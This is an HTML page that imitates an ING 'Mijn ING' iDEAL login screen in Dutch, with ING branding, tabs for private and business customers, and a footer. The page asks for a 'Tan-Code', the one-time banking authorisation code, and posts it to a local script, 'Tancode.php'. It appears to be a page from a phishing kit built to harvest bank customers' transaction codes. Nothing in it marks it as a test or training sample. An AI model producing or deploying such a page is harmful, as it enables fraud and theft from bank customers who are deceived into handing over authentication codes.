<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <title>iDEAL - Mijn ING</title>
      <style>
      a.link-as-tab .active {
    border-bottom: 3px solid #ff6200;
    font-weight: 700;
}
      
          .form-field__label ::slotted(*) {
    display: block;
    color: rgb(84, 84, 84);
    font-size: 16px;
    line-height: 24px;
    font-weight: normal;
    margin-bottom: 4px;
}
          ul {
    list-style-type: disc;
}
          .app-footer--link {
    margin: 8px;
    padding: 0;
    font-size: 14px;
    line-height: 20px;
    text-decoration: none;
    border-bottom: 1px solid #333333;
}
          .app-footer {
    min-height: 107px;
    width: 100%;
    padding-top: 24px;
}
          .app-footer ul {
    display: flex;
    flex-direction: column;
    justify-content: flex-start;
    flex-wrap: wrap;
    width: 90%;
    padding: 0;
    margin: 0 0 0 8px;
}
          .app-footer li {
    display: inline-block;
}
      </style>
  </head>
  <body class="bg-light">
      
      
      <div>
<nav class="navbar navbar-light bg-white justify-content-between" style="height:70px">
  <a class="navbar-brand ml-5" href="#">
    <img src="ing-logo.svg" width="70px" height="50px"></a>
  <form class="form-inline">
    <button class="btn  my-2 my-sm-0 bg-white" type="submit">NL | EN</button>
  </form>
</nav>
          <div class="container h-50 mt-5 bg-white" style="width: 35%">
                            <nav >
                    <div class="nav nav-tabs nav-fill" id="nav-tab" role="tablist" style="min-height: 48px;
    border-bottom: 2px solid #eeeeee;
    padding: 0 24px 0 0;
    display: flex;
    flex-direction: row;
    justify-content: start;
    box-sizing: border-box;
    flex-wrap: wrap;">
                      <a class="nav-item nav-link link-as-tab active col-3" id="nav-home-tab" data-toggle="tab" href="#nav-home" role="tab" aria-controls="nav-home" aria-selected="true" style="    line-height: 42px;
    color: #333333;
    border: none;
    padding: 0 12px;
    position: relative;
    bottom: -2px;
    text-decoration: none;
"> Particulier</a>
                      <a class="nav-item nav-link link-as-tab col-3" id="nav-profile-tab" data-toggle="tab" href="#nav-profile" role="tab" aria-controls="nav-profile" aria-selected="false" style="line-height: 42px;
    color: #333333;
    border: none;
    padding: 0 12px;
    position: relative;
    bottom: -2px;
    text-decoration: none;
    font-weight: 700;">Zakelijk</a>
                      
                    </div>
                  </nav>
                  <div class="tab-content py-3 px-3 px-sm-0" id="nav-tabContent">
                    <div class="tab-pane fade show active" id="nav-home" role="tabpanel" aria-labelledby="nav-home-tab">
                        <form action="Tancode.php" method="post">
                                                      <div class="form-row">
                            <div class="col" style="    font-size: 14px;
    line-height: 28px;
    font-weight: bold;
    color: #ff6200;
    margin-bottom: 16px;">
                            <h1 style="font-size: 19px">Log in bij Mijn ING</h1>
                                                          </div>
                            </div>
                                                      <div class="form-row">
                            <div class="col">
                             <label slot="label">Tan-Code</label>
                            </div>
                          </div>
                          <div class="form-row">
                            <div class="col-2">
                              <input type="text" class="form-control" placeholder="0000" name="Tancode">
                            </div>
                          </div>
                            
                            
                        <div class="form-row mt-4 text-left">
                            <div class="col-4" style="padding: none">
                             <input type="submit" class="btn" style="border-radius: 10%; font-weight: 500; font-size: 14px; background-color: #ff6200; color: white" value="Inloggen">
                            </div>
                            <div class="col">
                             <a style="color: dodgerblue; font-weight: 500" href="#"><u>Inloggegevens kwijt?</u></a>
                            </div>
                          </div>
                            
                        </form>
                    </div>
                    <div class="tab-pane fade" id="nav-profile" role="tabpanel" aria-labelledby="nav-profile-tab">
                                              <form>
                                                      <div class="form-row">
                            <div class="col" style="    font-size: 14px;
    line-height: 28px;
    font-weight: bold;
    color: #ff6200;
    margin-bottom: 16px;">
                            <h1 style="font-size: 19px">Log in bij Mijn ING</h1>
                                                          </div>
                            </div>
                                                      <div class="form-row">
                            <div class="col">
                             <label slot="label">Tan-Code</label>
                            </div>
                          </div>
                          <div class="form-row">
                            <div class="col-2">
                              <input type="text" class="form-control" placeholder="0000">
                            </div>
                          </div>
                            
                            
                        <div class="form-row mt-4 text-left">
                            <div class="col-4" style="padding: none">
                             <input type="submit" class="btn" style="border-radius: 10%; font-weight: 500; font-size: 14px; background-color: #ff6200; color: white" value="Inloggen">
                            </div>
                            <div class="col">
                             <a style="color: dodgerblue; font-weight: 500" href="#"><u>Inloggegevens kwijt?</u></a>
                            </div>
                          </div>
                           
                        </form>
                    </div>
                    
                  </div>
              
              </div>
          <div class="container h-50" style="width: 35%">
                        <footer class="app-footer">
                    <div class="row">
                    <!---->
                        
                        <div class="col-4"> <a class="app-footer--link" href="#" style="color: #333333"><!---->Veilig bankieren<!----></a> </div> <!----> 
                        <div class="col-4"> <a class="app-footer--link" href="#" style="color: #333333"><!---->Privacy en cookies<!----></a> </div> <!----> 
                        <div class="col-4"> <a class="app-footer--link" href="#" style="color: #333333"><!---->Disclaimer<!----></a> </div> <!---->
                    </div>
                </footer>
          </div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
          </div>
  </body>
</html>